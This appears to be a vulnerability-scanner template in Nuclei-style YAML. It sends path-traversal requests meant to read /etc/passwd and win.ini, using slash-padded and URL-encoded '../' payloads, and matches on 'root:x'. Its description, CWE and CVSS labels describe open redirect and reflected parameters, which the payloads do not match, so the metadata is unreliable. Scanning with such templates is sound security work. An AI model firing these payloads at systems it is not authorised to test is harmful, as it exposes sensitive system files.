http:
- matchers:
  - part: body
    type: word
    words:
    - root:x
    - '[mci extensions]'
  - status:
    - 200
    - 404
    type: status
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}///////////etc/passwd'
  - '{{BaseURL}}%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd'
  - '{{BaseURL}}///////////windows/win.ini'
  - '{{BaseURL}}////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////etc/passwd'
  - '{{BaseURL}}%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%2Fetc%2Fpasswd'
  - '{{BaseURL}}/resources/app//////////////////../../../../../../../../etc/passwd'
  - '{{BaseURL}}/static/../../../../../../../../etc/passwd'
  - '{{BaseURL}}/resources/app/../../../../../../../../etc/passwd'
id: 2lfiss-72
info:
  author: xandsz
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 2lfipp
  severity: medium
  tags: fuzzer, generic
